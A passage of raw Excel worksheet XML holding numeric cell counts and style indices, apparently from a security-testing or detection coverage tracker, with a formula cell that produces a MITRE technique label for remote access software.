      <c r="W57" s="96" t="s">
        <v>1259</v>
      </c>
      <c r="X57" s="196" t="s">
        <v>1260</v>
      </c>
      <c r="Y57" s="83" t="s">
        <v>1261</v>
      </c>
      <c r="Z57" s="188" t="s">
        <v>1262</v>
      </c>
      <c r="AA57" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB57" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC57" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD57" s="83"/>
      <c r="AE57" s="83"/>
      <c r="AF57" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG57" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH57" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI57" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ57" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK57" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL57" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM57" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN57" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO57" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP57" s="385" t="str">
        <f>M57&amp;"-frag"</f>
        <v>T1219-RemoteAccessSoftwareNAT-frag</v>
      </c>
      <c r="AQ57" s="646">
        <v>145</v>
      </c>
      <c r="AR57" s="100"/>
      <c r="AS57" s="100">
        <v>8</v>
      </c>
      <c r="AT57" s="100">
        <v>0</v>
      </c>
      <c r="AU57" s="100">
        <v>8</v>
      </c>
      <c r="AV57" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW57" s="100">
        <v>8</v>
      </c>
      <c r="AX57" s="100">
        <v>8</v>
      </c>
      <c r="AY57" s="100">
        <v>0</v>
      </c>
      <c r="AZ57" s="100">
        <v>8</v>
      </c>
      <c r="BA57" s="381"/>
      <c r="BB57" s="101">
        <v>114</v>
      </c>
      <c r="BC57" s="102" t="s">
        <v>2024</v>
      </c>
      <c r="BD57" s="102">
        <v>83</v>
      </c>
      <c r="BE57" s="103" t="s">
        <v>2025</v>
      </c>
      <c r="BF57" s="103">
        <v>5</v>
      </c>
      <c r="BG57" s="104">
        <v>27</v>
      </c>
      <c r="BH57" s="105">
        <v>0</v>
      </c>
      <c r="BI57" s="106">
        <v>0</v>
      </c>
      <c r="BJ57" s="497">
        <v>0</v>
      </c>
      <c r="BK57" s="107">
        <v>0</v>
      </c>
      <c r="BL57" s="107">
        <v>0</v>
      </c>
      <c r="BM57" s="108">
        <v>0</v>
      </c>
      <c r="BN57" s="109">
        <v>114</v>
      </c>
      <c r="BO57" s="110" t="s">
        <v>2024</v>
      </c>
      <c r="BP57" s="501">
        <v>83</v>
      </c>
      <c r="BQ57" s="111" t="s">
        <v>2025</v>
      </c>
      <c r="BR57" s="111">
        <v>5</v>
      </c>
      <c r="BS57" s="112">
        <v>27</v>
      </c>
      <c r="BT57" s="113">
        <v>159</v>
      </c>
      <c r="BU57" s="114" t="s">
        <v>3338</v>
      </c>
      <c r="BV57" s="503">
        <v>114</v>
      </c>
      <c r="BW57" s="115" t="s">
        <v>3339</v>
      </c>
      <c r="BX57" s="115">
        <v>10</v>
      </c>
      <c r="BY57" s="116">
        <v>50</v>
      </c>
      <c r="BZ57" s="250">
        <v>32</v>
      </c>
      <c r="CA57" s="251" t="s">
        <v>3340</v>
      </c>
      <c r="CB57" s="505">
        <v>32</v>
      </c>
      <c r="CC57" s="252" t="s">
        <v>3341</v>
      </c>
      <c r="CD57" s="252">
        <v>5</v>
      </c>
      <c r="CE57" s="253">
        <v>30</v>
      </c>
      <c r="CF57" s="101">
        <v>191</v>
      </c>
      <c r="CG57" s="102" t="s">
        <v>3342</v>
      </c>
      <c r="CH57" s="102">
        <v>146</v>
      </c>
      <c r="CI57" s="103" t="s">
        <v>3343</v>
      </c>
      <c r="CJ57" s="103">
        <v>15</v>
      </c>
      <c r="CK57" s="104">
        <v>62</v>
      </c>
      <c r="CL57" s="105">
        <v>0</v>
      </c>
      <c r="CM57" s="106">
        <v>0</v>
      </c>
      <c r="CN57" s="497">
        <v>0</v>
      </c>
      <c r="CO57" s="107">
        <v>0</v>
      </c>
      <c r="CP57" s="107">
        <v>0</v>
      </c>
      <c r="CQ57" s="108">
        <v>0</v>
      </c>
      <c r="CR57" s="109">
        <v>1</v>
      </c>
      <c r="CS57" s="110" t="s">
        <v>1946</v>
      </c>
      <c r="CT57" s="501">
        <v>1</v>
      </c>
      <c r="CU57" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="CV57" s="111">
        <v>1</v>
      </c>
      <c r="CW57" s="112">
        <v>1</v>
      </c>
      <c r="CX57" s="113">
        <v>115</v>
      </c>
      <c r="CY57" s="114" t="s">
        <v>2163</v>
      </c>
      <c r="CZ57" s="503">
        <v>84</v>
      </c>
      <c r="DA57" s="115" t="s">
        <v>2164</v>
      </c>
      <c r="DB57" s="115">
        <v>6</v>
      </c>
      <c r="DC57" s="116">
        <v>28</v>
      </c>
      <c r="DD57" s="101">
        <v>0</v>
      </c>
      <c r="DE57" s="102">
        <v>0</v>
      </c>
      <c r="DF57" s="102">
        <v>0</v>
      </c>
      <c r="DG57" s="103">
        <v>0</v>
      </c>
      <c r="DH57" s="103">
        <v>0</v>
      </c>
      <c r="DI57" s="104">
        <v>0</v>
      </c>
      <c r="DJ57" s="105">
        <v>0</v>
      </c>
      <c r="DK57" s="106">
        <v>0</v>
      </c>
      <c r="DL57" s="497">
        <v>0</v>
      </c>
      <c r="DM57" s="107">
        <v>0</v>
      </c>
      <c r="DN57" s="107">
        <v>0</v>
      </c>
      <c r="DO57" s="108">
        <v>0</v>
      </c>
      <c r="DP57" s="109">
        <v>0</v>
      </c>
      <c r="DQ57" s="110">
        <v>0</v>
      </c>
      <c r="DR57" s="501">
        <v>0</v>
      </c>
      <c r="DS57" s="111">
        <v>0</v>
      </c>
      <c r="DT57" s="111">
        <v>0</v>
      </c>
      <c r="DU57" s="112">
        <v>0</v>
      </c>
      <c r="DV57" s="113">
        <v>44</v>
      </c>
      <c r="DW57" s="114" t="s">
        <v>3344</v>
      </c>
      <c r="DX57" s="503">
        <v>30</v>
      </c>
      <c r="DY57" s="115" t="s">
        <v>3345</v>
      </c>
      <c r="DZ57" s="115">
        <v>4</v>
      </c>
      <c r="EA57" s="116">
        <v>29</v>
      </c>
      <c r="EB57" s="250">
        <v>0</v>
      </c>
      <c r="EC57" s="251">
        <v>0</v>
      </c>
      <c r="ED57" s="505">
        <v>0</v>
      </c>
      <c r="EE57" s="252">
        <v>0</v>
      </c>
      <c r="EF57" s="252">
        <v>0</v>
      </c>
      <c r="EG57" s="253">
        <v>0</v>
      </c>
      <c r="EH57" s="101">
        <v>44</v>
      </c>
      <c r="EI57" s="102" t="s">
        <v>3344</v>
      </c>
      <c r="EJ57" s="102">
        <v>30</v>
      </c>
      <c r="EK57" s="103" t="s">
        <v>3345</v>
      </c>
      <c r="EL57" s="103">
        <v>4</v>
      </c>
      <c r="EM57" s="104">
        <v>29</v>
      </c>
      <c r="EN57" s="105">
        <v>0</v>
      </c>
      <c r="EO57" s="106">
        <v>0</v>
      </c>
      <c r="EP57" s="497">
        <v>0</v>
      </c>
      <c r="EQ57" s="107">
        <v>0</v>
      </c>
      <c r="ER57" s="107">
        <v>0</v>
      </c>
      <c r="ES57" s="108">
        <v>0</v>
      </c>
      <c r="ET57" s="109">
        <v>0</v>
      </c>
      <c r="EU57" s="110">
        <v>0</v>
      </c>
      <c r="EV57" s="501">
        <v>0</v>
      </c>
      <c r="EW57" s="111">
        <v>0</v>
      </c>
      <c r="EX57" s="111">
        <v>0</v>
      </c>
      <c r="EY57" s="112">
        <v>0</v>
      </c>
      <c r="EZ57" s="113">
        <v>0</v>
      </c>
      <c r="FA57" s="114">
        <v>0</v>
      </c>
      <c r="FB57" s="503">
        <v>0</v>
      </c>
      <c r="FC57" s="115">
        <v>0</v>
      </c>
      <c r="FD57" s="115">
        <v>0</v>
      </c>
      <c r="FE57" s="116">
        <v>0</v>
      </c>
      <c r="FF57" s="101">
        <v>39</v>
      </c>
      <c r="FG57" s="102" t="s">
        <v>3346</v>
      </c>
      <c r="FH57" s="102">
        <v>8</v>
      </c>
      <c r="FI57" s="103" t="s">
        <v>1794</v>
      </c>
      <c r="FJ57" s="103">
        <v>2</v>
      </c>
      <c r="FK57" s="104">
        <v>8</v>
      </c>
      <c r="FL57" s="105">
        <v>0</v>
      </c>
      <c r="FM57" s="106">
        <v>0</v>
      </c>
      <c r="FN57" s="497">
        <v>0</v>
      </c>
      <c r="FO57" s="107">
        <v>0</v>
      </c>
      <c r="FP57" s="107">
        <v>0</v>
      </c>
      <c r="FQ57" s="108">
        <v>0</v>
      </c>
      <c r="FR57" s="109">
        <v>39</v>
      </c>
      <c r="FS57" s="110" t="s">
        <v>3346</v>
      </c>
      <c r="FT57" s="501">
        <v>8</v>
      </c>
      <c r="FU57" s="111" t="s">
        <v>1794</v>
      </c>
      <c r="FV57" s="111">
        <v>2</v>
      </c>
      <c r="FW57" s="112">
        <v>8</v>
      </c>
      <c r="FX57" s="113">
        <v>40</v>
      </c>
      <c r="FY57" s="114" t="s">
        <v>3347</v>
      </c>
      <c r="FZ57" s="503">
        <v>9</v>
      </c>
      <c r="GA57" s="115" t="s">
        <v>3348</v>
      </c>
      <c r="GB57" s="115">
        <v>3</v>
      </c>
      <c r="GC57" s="116">
        <v>9</v>
      </c>
      <c r="GD57" s="250">
        <v>28</v>
      </c>
      <c r="GE57" s="251" t="s">
        <v>3349</v>
      </c>
      <c r="GF57" s="505">
        <v>28</v>
      </c>
      <c r="GG57" s="252" t="s">
        <v>2557</v>
      </c>
      <c r="GH57" s="252">
        <v>2</v>
      </c>
      <c r="GI57" s="253">
        <v>27</v>
      </c>
      <c r="GJ57" s="101">
        <v>68</v>
      </c>
      <c r="GK57" s="102" t="s">
        <v>3350</v>
      </c>
      <c r="GL57" s="102">
        <v>37</v>
      </c>
      <c r="GM57" s="103" t="s">
        <v>3351</v>
      </c>
      <c r="GN57" s="103">
        <v>5</v>
      </c>
      <c r="GO57" s="104">
        <v>33</v>
      </c>
      <c r="GP57" s="105">
        <v>0</v>
      </c>
      <c r="GQ57" s="106">
        <v>0</v>
      </c>
      <c r="GR57" s="497">
        <v>0</v>
      </c>
      <c r="GS57" s="107">
        <v>0</v>
      </c>
      <c r="GT57" s="107">
        <v>0</v>
      </c>
      <c r="GU57" s="108">
        <v>0</v>
      </c>
      <c r="GV57" s="109">
        <v>1</v>
      </c>
      <c r="GW57" s="110" t="s">
        <v>1946</v>
      </c>
      <c r="GX57" s="501">
        <v>1</v>
      </c>
      <c r="GY57" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="GZ57" s="111">
        <v>1</v>
      </c>
      <c r="HA57" s="112">
        <v>1</v>
      </c>
      <c r="HB57" s="113">
        <v>40</v>
      </c>
      <c r="HC57" s="114" t="s">
        <v>3347</v>
      </c>
      <c r="HD57" s="503">
        <v>9</v>
      </c>
      <c r="HE57" s="115" t="s">
        <v>3348</v>
      </c>
      <c r="HF57" s="115">
        <v>3</v>
      </c>
      <c r="HG57" s="116">
        <v>9</v>
      </c>
      <c r="HH57" s="101">
        <v>75</v>
      </c>
      <c r="HI57" s="102" t="s">
        <v>3352</v>
      </c>
      <c r="HJ57" s="102">
        <v>75</v>
      </c>
      <c r="HK57" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="HL57" s="103">
        <v>3</v>
      </c>
      <c r="HM57" s="104">
        <v>26</v>
      </c>
      <c r="HN57" s="105">
        <v>0</v>
      </c>
      <c r="HO57" s="106">
        <v>0</v>
      </c>
      <c r="HP57" s="497">
        <v>0</v>
      </c>
      <c r="HQ57" s="107">
        <v>0</v>
      </c>
      <c r="HR57" s="107">
        <v>0</v>
      </c>
      <c r="HS57" s="108">
        <v>0</v>
      </c>
      <c r="HT57" s="109">
        <v>75</v>
      </c>
      <c r="HU57" s="110" t="s">
        <v>3352</v>
      </c>
      <c r="HV57" s="501">
        <v>75</v>
      </c>
      <c r="HW57" s="111" t="s">
        <v>1788</v>
      </c>
      <c r="HX57" s="111">
        <v>3</v>
      </c>
      <c r="HY57" s="112">
        <v>26</v>
      </c>
      <c r="HZ57" s="113">
        <v>75</v>
      </c>
      <c r="IA57" s="114" t="s">
        <v>3352</v>
      </c>
      <c r="IB57" s="503">
        <v>75</v>
      </c>
      <c r="IC57" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="ID57" s="115">
        <v>3</v>
      </c>
      <c r="IE57" s="116">
        <v>26</v>
      </c>
      <c r="IF57" s="250">
        <v>4</v>
      </c>
      <c r="IG57" s="251" t="s">
        <v>3353</v>
      </c>
      <c r="IH57" s="505">
        <v>4</v>
      </c>
      <c r="II57" s="252" t="s">
        <v>3354</v>
      </c>
      <c r="IJ57" s="252">
        <v>3</v>
      </c>
      <c r="IK57" s="253">
        <v>4</v>
      </c>
      <c r="IL57" s="101">
        <v>79</v>
      </c>
      <c r="IM57" s="102" t="s">
        <v>3355</v>
      </c>
      <c r="IN57" s="102">
        <v>79</v>
      </c>
      <c r="IO57" s="103" t="s">
        <v>3356</v>
      </c>
      <c r="IP57" s="103">
        <v>6</v>
      </c>
      <c r="IQ57" s="104">
        <v>29</v>
      </c>
      <c r="IR57" s="105">
        <v>0</v>
      </c>
      <c r="IS57" s="106">
        <v>0</v>
      </c>
      <c r="IT57" s="497">
        <v>0</v>
      </c>
      <c r="IU57" s="107">
        <v>0</v>
      </c>
      <c r="IV57" s="107">
        <v>0</v>
      </c>
      <c r="IW57" s="108">
        <v>0</v>
      </c>
      <c r="IX57" s="109">
        <v>0</v>
      </c>
      <c r="IY57" s="110">
        <v>0</v>
      </c>
      <c r="IZ57" s="501">
        <v>0</v>
      </c>
      <c r="JA57" s="111">
        <v>0</v>
      </c>
      <c r="JB57" s="111">
        <v>0</v>
      </c>
      <c r="JC57" s="112">
        <v>0</v>
      </c>
      <c r="JD57" s="113">
        <v>75</v>
      </c>
      <c r="JE57" s="114" t="s">
        <v>3352</v>
      </c>
      <c r="JF57" s="503">
        <v>75</v>
      </c>
      <c r="JG57" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="JH57" s="115">
        <v>3</v>
      </c>
      <c r="JI57" s="116">
        <v>26</v>
      </c>
      <c r="JJ57" s="101">
        <v>0</v>
      </c>
      <c r="JK57" s="102">
        <v>0</v>
      </c>
      <c r="JL57" s="102">
        <v>0</v>
      </c>
      <c r="JM57" s="103">
        <v>0</v>
      </c>
      <c r="JN57" s="103">
        <v>0</v>
      </c>
      <c r="JO57" s="104">
        <v>0</v>
      </c>
      <c r="JP57" s="105">
        <v>0</v>
      </c>
      <c r="JQ57" s="106">
        <v>0</v>
      </c>
      <c r="JR57" s="497">
        <v>0</v>
      </c>
      <c r="JS57" s="107">
        <v>0</v>
      </c>
      <c r="JT57" s="107">
        <v>0</v>
      </c>
      <c r="JU57" s="108">
        <v>0</v>
      </c>
      <c r="JV57" s="109">
        <v>0</v>
      </c>
      <c r="JW57" s="110">
        <v>0</v>
      </c>
      <c r="JX57" s="501">
        <v>0</v>
      </c>
      <c r="JY57" s="111">
        <v>0</v>
      </c>
      <c r="JZ57" s="111">
        <v>0</v>
      </c>
      <c r="KA57" s="112">
        <v>0</v>
      </c>
      <c r="KB57" s="113">
        <v>0</v>
      </c>
      <c r="KC57" s="114">
        <v>0</v>
      </c>
      <c r="KD57" s="503">
        <v>0</v>
      </c>
      <c r="KE57" s="115">
        <v>0</v>
      </c>
      <c r="KF57" s="115">
        <v>0</v>
      </c>
      <c r="KG57" s="116">
        <v>0</v>
      </c>
      <c r="KH57" s="250">
        <v>0</v>
      </c>
      <c r="KI57" s="251">
        <v>0</v>
      </c>
      <c r="KJ57" s="505">
        <v>0</v>
      </c>
      <c r="KK57" s="252">
        <v>0</v>
      </c>
      <c r="KL57" s="252">
        <v>0</v>
      </c>
      <c r="KM57" s="253">
        <v>0</v>
      </c>
      <c r="KN57" s="101">
        <v>0</v>
      </c>
      <c r="KO57" s="102">
        <v>0</v>
      </c>
      <c r="KP57" s="102">
        <v>0</v>
      </c>
      <c r="KQ57" s="103">
        <v>0</v>
      </c>
      <c r="KR57" s="103">
        <v>0</v>
      </c>
      <c r="KS57" s="104">
        <v>0</v>
      </c>
      <c r="KT57" s="105">
        <v>0</v>
      </c>
      <c r="KU57" s="106">
        <v>0</v>
      </c>
      <c r="KV57" s="497">
        <v>0</v>
      </c>
      <c r="KW57" s="107">
        <v>0</v>
      </c>
      <c r="KX57" s="107">
        <v>0</v>
      </c>
      <c r="KY57" s="108">
        <v>0</v>
      </c>
      <c r="KZ57" s="109">
        <v>0</v>
      </c>
      <c r="LA57" s="110">
        <v>0</v>
      </c>
      <c r="LB57" s="501">
        <v>0</v>
      </c>
      <c r="LC57" s="111">
        <v>0</v>
      </c>
      <c r="LD57" s="111">
        <v>0</v>
      </c>
      <c r="LE57" s="112">
        <v>0</v>
      </c>
      <c r="LF57" s="113">
        <v>0</v>
      </c>
      <c r="LG57" s="114">
        <v>0</v>
      </c>
      <c r="LH57" s="503">
        <v>0</v>
      </c>
      <c r="LI57" s="115">
        <v>0</v>
      </c>
      <c r="LJ57" s="115">
        <v>0</v>
      </c>
      <c r="LK57" s="116">
        <v>0</v>
      </c>
      <c r="LL57" s="117">
        <v>175</v>
      </c>
      <c r="LM57" s="507">
        <v>174</v>
      </c>
      <c r="LN57" s="119">
        <v>2</v>
      </c>
      <c r="LO57" s="119">
        <v>6</v>
      </c>
      <c r="LP57" s="119">
        <v>145</v>
      </c>
      <c r="LQ57" s="119">
        <v>32</v>
      </c>
      <c r="LR57" s="119">
        <v>140</v>
      </c>
      <c r="LS57" s="119">
        <v>145</v>
      </c>
      <c r="LT57" s="382"/>
      <c r="LU57" s="117">
        <v>0</v>
      </c>
      <c r="LV57" s="118">
        <v>0</v>
      </c>
      <c r="LW57" s="507">
        <v>0</v>
      </c>
      <c r="LX57" s="119">
        <v>0</v>
      </c>
      <c r="LY57" s="119">
        <v>0</v>
      </c>
      <c r="LZ57" s="119">
        <v>0</v>
      </c>
      <c r="MA57" s="117">
        <v>31</v>
      </c>
      <c r="MB57" s="118" t="s">
        <v>4232</v>
      </c>
      <c r="MC57" s="507">
        <v>31</v>
      </c>
      <c r="MD57" s="119" t="s">
        <v>2962</v>
      </c>
      <c r="ME57" s="119">
        <v>1</v>
      </c>
      <c r="MF57" s="119">
        <v>31</v>
      </c>
      <c r="MG57" s="117">
        <v>0</v>
      </c>
      <c r="MH57" s="118">
        <v>0</v>
      </c>
      <c r="MI57" s="507">
        <v>0</v>
      </c>
      <c r="MJ57" s="119">
        <v>0</v>
      </c>
      <c r="MK57" s="119">
        <v>0</v>
      </c>
      <c r="ML57" s="119">
        <v>0</v>
      </c>
      <c r="MM57" s="117">
        <v>0</v>
      </c>
      <c r="MN57" s="118">
        <v>0</v>
      </c>
      <c r="MO57" s="507">
        <v>0</v>
      </c>
      <c r="MP57" s="119">
        <v>0</v>
      </c>
      <c r="MQ57" s="119">
        <v>0</v>
      </c>
      <c r="MR57" s="119">
        <v>0</v>
      </c>
      <c r="MS57" s="117">
        <v>3</v>
      </c>
      <c r="MT57" s="118" t="s">
        <v>4233</v>
      </c>
      <c r="MU57" s="507">
        <v>2</v>
      </c>
      <c r="MV57" s="119" t="s">
        <v>2789</v>
      </c>
      <c r="MW57" s="119">
        <v>1</v>
      </c>
      <c r="MX57" s="119">
        <v>2</v>
      </c>
      <c r="MY57" s="117">
        <v>0</v>
      </c>
      <c r="MZ57" s="118">
        <v>0</v>
      </c>
      <c r="NA57" s="507">
        <v>0</v>
      </c>
      <c r="NB57" s="119">
        <v>0</v>
      </c>
      <c r="NC57" s="119">
        <v>0</v>
      </c>
      <c r="ND57" s="119">
        <v>0</v>
      </c>
      <c r="NE57" s="117">
        <v>10</v>
      </c>
      <c r="NF57" s="118" t="s">
        <v>4234</v>
      </c>
      <c r="NG57" s="507">
        <v>10</v>
      </c>
      <c r="NH57" s="119" t="s">
        <v>2562</v>
      </c>
      <c r="NI57" s="119">
        <v>1</v>
      </c>
      <c r="NJ57" s="119">
        <v>10</v>
      </c>
      <c r="NK57" s="117">
        <v>0</v>
      </c>
      <c r="NL57" s="118">
        <v>0</v>
      </c>
      <c r="NM57" s="507">
        <v>0</v>
      </c>
      <c r="NN57" s="119">
        <v>0</v>
      </c>
      <c r="NO57" s="119">
        <v>0</v>
      </c>
      <c r="NP57" s="119">
        <v>0</v>
      </c>
      <c r="NQ57" s="117">
        <v>8</v>
      </c>
      <c r="NR57" s="118" t="s">
        <v>4374</v>
      </c>
      <c r="NS57" s="507">
        <v>8</v>
      </c>
      <c r="NT57" s="119" t="s">
        <v>3357</v>
      </c>
      <c r="NU57" s="119">
        <v>2</v>
      </c>
      <c r="NV57" s="119">
        <v>7</v>
      </c>
      <c r="NW57" s="117">
        <v>123</v>
      </c>
      <c r="NX57" s="118" t="s">
        <v>4375</v>
      </c>
      <c r="NY57" s="507">
        <v>123</v>
      </c>
      <c r="NZ57" s="119" t="s">
        <v>4235</v>
      </c>
      <c r="OA57" s="119">
        <v>3</v>
      </c>
      <c r="OB57" s="119">
        <v>123</v>
      </c>
      <c r="OC57" s="120">
        <v>30</v>
      </c>
      <c r="OD57" s="120">
        <v>28</v>
      </c>
      <c r="OE57" s="120">
        <v>6</v>
      </c>
      <c r="OF57" s="121">
        <v>2</v>
      </c>
      <c r="OG57" s="120">
        <v>21</v>
      </c>
      <c r="OH57" s="120">
        <v>21</v>
      </c>
      <c r="OI57" s="120">
        <v>21</v>
      </c>
      <c r="OJ57" s="120">
        <v>21</v>
      </c>
      <c r="OK57" s="383"/>
      <c r="OL57" s="120">
        <v>30</v>
      </c>
      <c r="OM57" s="120">
        <v>30</v>
      </c>
      <c r="ON57" s="120">
        <v>28</v>
      </c>
      <c r="OO57" s="120" t="s">
        <v>3358</v>
      </c>
      <c r="OP57" s="120">
        <v>6</v>
      </c>
      <c r="OQ57" s="464">
        <v>21</v>
      </c>
      <c r="OR57" s="120">
        <v>0</v>
      </c>
      <c r="OS57" s="120">
        <v>0</v>
      </c>
      <c r="OT57" s="120">
        <v>0</v>
      </c>
      <c r="OU57" s="120"/>
      <c r="OV57" s="120">
        <v>0</v>
      </c>
      <c r="OW57" s="464">
        <v>0</v>
      </c>
      <c r="OX57" s="120">
        <v>0</v>
      </c>
      <c r="OY57" s="120">
        <v>0</v>
      </c>
      <c r="OZ57" s="120">
        <v>0</v>
      </c>
      <c r="PA57" s="120"/>
      <c r="PB57" s="120">
        <v>0</v>
      </c>
      <c r="PC57" s="464">
        <v>0</v>
      </c>
      <c r="PD57" s="120">
        <v>0</v>
      </c>
      <c r="PE57" s="120">
        <v>0</v>
      </c>
      <c r="PF57" s="120">
        <v>0</v>
      </c>
      <c r="PG57" s="120"/>
      <c r="PH57" s="120">
        <v>0</v>
      </c>
      <c r="PI57" s="464">
        <v>0</v>
      </c>
      <c r="PJ57" s="120">
        <v>0</v>
      </c>
      <c r="PK57" s="120">
        <v>0</v>
      </c>
      <c r="PL57" s="120">
        <v>0</v>
      </c>
      <c r="PM57" s="120"/>
      <c r="PN57" s="120">
        <v>0</v>
      </c>
      <c r="PO57" s="464">
        <v>0</v>
      </c>
      <c r="PP57" s="120">
        <v>23</v>
      </c>
      <c r="PQ57" s="120">
        <v>23</v>
      </c>
      <c r="PR57" s="120">
        <v>19</v>
      </c>
      <c r="PS57" s="120" t="s">
        <v>2660</v>
      </c>
      <c r="PT57" s="120">
        <v>1</v>
      </c>
      <c r="PU57" s="464">
        <v>19</v>
      </c>
      <c r="PV57" s="120">
        <v>7</v>
      </c>
      <c r="PW57" s="120">
        <v>7</v>
      </c>
      <c r="PX57" s="120">
        <v>4</v>
      </c>
      <c r="PY57" s="120" t="s">
        <v>4443</v>
      </c>
      <c r="PZ57" s="120">
        <v>1</v>
      </c>
      <c r="QA57" s="464">
        <v>4</v>
      </c>
      <c r="QB57" s="120">
        <v>0</v>
      </c>
      <c r="QC57" s="120">
        <v>0</v>
      </c>
      <c r="QD57" s="120">
        <v>0</v>
      </c>
      <c r="QE57" s="120"/>
      <c r="QF57" s="120">
        <v>0</v>
      </c>
      <c r="QG57" s="464">
        <v>0</v>
      </c>
      <c r="QH57" s="120">
        <v>0</v>
      </c>
      <c r="QI57" s="120">
        <v>0</v>
      </c>
      <c r="QJ57" s="120">
        <v>0</v>
      </c>
      <c r="QK57" s="120"/>
      <c r="QL57" s="120">
        <v>0</v>
      </c>
      <c r="QM57" s="464">
        <v>0</v>
      </c>
      <c r="QN57" s="120">
        <v>0</v>
      </c>
      <c r="QO57" s="120">
        <v>0</v>
      </c>
      <c r="QP57" s="120">
        <v>0</v>
      </c>
      <c r="QQ57" s="120"/>
      <c r="QR57" s="120">
        <v>0</v>
      </c>
      <c r="QS57" s="464">
        <v>0</v>
      </c>
      <c r="QT57" s="184"/>
      <c r="QU57" s="184"/>
      <c r="QV57" s="184"/>
      <c r="QW57" s="184"/>
      <c r="QX57" s="184"/>
      <c r="QY57" s="184"/>
      <c r="QZ57" s="184"/>
      <c r="RA57" s="184"/>
      <c r="RB57" s="184"/>
      <c r="RC57" s="184"/>
      <c r="RD57" s="184"/>
      <c r="RE57" s="184"/>
      <c r="RF57" s="184"/>
      <c r="RG57" s="184"/>
      <c r="RH57" s="184"/>
      <c r="RI57" s="184"/>
      <c r="RJ57" s="184"/>
      <c r="RK57" s="184"/>
      <c r="RL57" s="184"/>
      <c r="RM57" s="184"/>
      <c r="RN57" s="184"/>
      <c r="RO57" s="184"/>
      <c r="RP57" s="184"/>
      <c r="RQ57" s="184"/>
      <c r="RR57" s="184"/>
      <c r="RS57" s="184"/>
      <c r="RT57" s="184"/>
      <c r="RU57" s="184"/>
      <c r="RV57" s="184"/>
      <c r="RW57" s="184"/>
      <c r="RX57" s="184"/>
      <c r="RY57" s="184"/>
      <c r="RZ57" s="184"/>
      <c r="SA57" s="184"/>
      <c r="SB57" s="184"/>
      <c r="SC57" s="184"/>
      <c r="SD57" s="184"/>
      <c r="SE57" s="184"/>
      <c r="SF57" s="184"/>
      <c r="SG57" s="184"/>
      <c r="SH57" s="184"/>
      <c r="SI57" s="184"/>
      <c r="SJ57" s="184"/>
      <c r="SK57" s="184"/>
      <c r="SL57" s="184"/>
      <c r="SM57" s="184"/>
      <c r="SN57" s="184"/>
      <c r="SO57" s="184"/>
      <c r="SP57" s="184"/>
      <c r="SQ57" s="184"/>
      <c r="SR57" s="184"/>
      <c r="SS57" s="184"/>
      <c r="ST57" s="184"/>
      <c r="SU57" s="184"/>
      <c r="SV57" s="184"/>
      <c r="SW57" s="184"/>
      <c r="SX57" s="184"/>
      <c r="SY57" s="184"/>
      <c r="SZ57" s="184"/>
      <c r="TA57" s="184"/>
      <c r="TB57" s="184"/>
      <c r="TC57" s="184"/>
      <c r="TD57" s="184"/>
      <c r="TE57" s="184"/>
      <c r="TF57" s="184"/>
      <c r="TG57" s="184"/>
      <c r="TH57" s="184"/>
      <c r="TI57" s="184"/>
      <c r="TJ57" s="184"/>
      <c r="TK57" s="184"/>
      <c r="TL57" s="184"/>
      <c r="TM57" s="184"/>
      <c r="TN57" s="184"/>
      <c r="TO57" s="184"/>
      <c r="TP57" s="184"/>
      <c r="TQ57" s="184"/>
      <c r="TR57" s="184"/>
      <c r="TS57" s="184"/>
      <c r="TT57" s="184"/>
      <c r="TU57" s="184"/>
      <c r="TV57" s="184"/>
      <c r="TW57" s="184"/>
      <c r="TX57" s="184"/>
      <c r="TY57" s="184"/>
      <c r="TZ57" s="184"/>
      <c r="UA57" s="184"/>
      <c r="UB57" s="184"/>
      <c r="UC57" s="184"/>
      <c r="UD57" s="184"/>
      <c r="UE57" s="184"/>
      <c r="UF57" s="184"/>
      <c r="UG57" s="184"/>
      <c r="UH57" s="184"/>
      <c r="UI57" s="184"/>
      <c r="UJ57" s="184"/>
      <c r="UK57" s="184"/>
      <c r="UL57" s="184"/>
      <c r="UM57" s="184"/>
      <c r="UN57" s="184"/>
      <c r="UO57" s="184"/>
      <c r="UP57" s="184"/>
      <c r="UQ57" s="184"/>
      <c r="UR57" s="184"/>
      <c r="US57" s="184"/>
      <c r="UT57" s="184"/>
      <c r="UU57" s="184"/>
      <c r="UV57" s="184"/>
      <c r="UW57" s="184"/>
      <c r="UX57" s="184"/>
      <c r="UY57" s="184"/>
      <c r="UZ57" s="184"/>
      <c r="VA57" s="184"/>
      <c r="VB57" s="184"/>
      <c r="VC57" s="184"/>
      <c r="VD57" s="184"/>
      <c r="VE57" s="184"/>
      <c r="VF57" s="184"/>
      <c r="VG57" s="184"/>
      <c r="VH57" s="184"/>
      <c r="VI57" s="184"/>
      <c r="VJ57" s="184"/>
      <c r="VK57" s="184"/>
      <c r="VL57" s="184"/>
      <c r="VM57" s="184"/>
      <c r="VN57" s="184"/>
      <c r="VO57" s="184"/>
      <c r="VP57" s="184"/>
      <c r="VQ57" s="184"/>
      <c r="VR57" s="184"/>
      <c r="VS57" s="184"/>
      <c r="VT57" s="184"/>
      <c r="VU57" s="184"/>
      <c r="VV57" s="184"/>
      <c r="VW57" s="184"/>
      <c r="VX57" s="184"/>
      <c r="VY57" s="184"/>
    </row>
    <row r="58" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A58" s="82" t="s">
        <v>47</v>
      </c>
      <c r="B58" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C58" s="83" t="s">
        <v>312</v>
      </c>
      <c r="D58" s="83" t="s">
        <v>103</v>
      </c>
      <c r="E58" s="83">
        <f t="shared" si="2"/>
        <v>43</v>
      </c>
      <c r="F58" s="83" t="s">
